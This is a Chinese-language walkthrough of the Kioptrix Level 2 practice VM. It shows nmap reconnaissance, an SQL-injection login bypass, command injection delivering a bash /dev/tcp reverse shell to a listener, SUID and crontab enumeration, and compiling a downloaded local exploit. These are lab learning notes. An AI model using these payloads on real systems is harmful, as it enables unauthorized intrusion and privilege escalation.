Kioptrix Level 2
Reference:https://www.bilibili.com/video/BV1Hg4y1V71P/?spm_id_from=333.788&vd_source=f087e6be527de705b4179c540f27e10d
信息收集
探测靶机ip
nmap 192.168.47.1/24 -sn -min-rate 2222 -r
经过推断,192.168.47.129为靶机的IP地址
探测端口
nmap 192.168.47.129 -p- -min-rate 8888 -r -PN -oA nmap_results/port_scan
服务探测
cat nmap_results/port_scan.nmap | grep open | awk -F '/' '{print $1}' | tr '\n' ','
-grep命令用于查找文件里符合条件的字符串或正则表达式。
-awk 用来进行文本分析并执行脚本
-tr 文本替换
该命令是为了将所有扫描的端口利用脚本得到,为了下一步扫描
nmap -sV -sC -O --version-all -oA nmap_results/service_info 192.168.46.129 -p 22,80,111,443,631,836,3306
-sV 探测版本
-sC 探测脚本 等价于 -script-defult
--version-all 尝试每一个强度
-p 指定端口
基本漏洞检测
nmap 192.168.46.129 -script=vuln -oA nmap_results/vuln_info -p 22,80,111,443,631,836,3306
渗透开始
80端口
尝试用万能密码`admin' or '1' = '1
成功登录,观察不难发现可能存在命令注入
开始反弹shell
||bash -i >& /dev/tcp/192.168.47.133/2233 0>&1
nc -lvvp 2233
bash: 表示要执行的命令是Bash,即Bourne Again SHell,是一种常见的Unix和Linux操作系统的命令行解释器。-i: 这个选项表示将Bash交互式运行,即打开一个交互式Shell会话,使得用户可以与Shell进行交互。>&: 这是重定向符号,用于将输出重定向到指定的位置。/dev/tcp/192.168.47.133/2233: 这是将输出重定向到的位置。/dev/tcp/是Bash的一个特殊设备,可以用于进行网络通信。在这里,它表示连接到指定的IP地址(192.168.47.133)和端口号(2233)。0>&1: 这是将输入重定向符号,用于将标准输入(文件描述符0)重定向到标准输出(文件描述符1)。这样做的目的是将用户输入的命令发送到远程连接的主机。
成功拿到shell
继续信息收集
查看计划任务
cat /etc/crontab
查看Setuid权限文件
find / -perm -u=s -type f 2>/dev/null
-perm: 这是find命令的一个选项,用于指定要匹配的文件权限。-u=s: 这是-perm选项的参数部分,表示要匹配设置了Setuid权限的文件。Setuid权限是一种特殊权限,当用户执行具有Setuid权限的可执行文件时,会以文件所有者的权限来执行,而不是执行用户自己的权限。
查看内核和发行版信息
使用脚本
别问我为什么用第一个(因为视频里用的第一个,其他的暂时未尝试)
本地起http服务方便下载代码
python -m http.server --bind 0.0.0.0 8080
下载代码并执行
绷,这里不知道为什么放在8000 8080端口都无法下载,最后改到8899端口才下载好
订正:应该和端口没有关系,可能是一开始的目录权限不对。在shell中切换到/tmp目录下重新下载就成功了
gcc -Wall 9545.c -o 9545
./9545
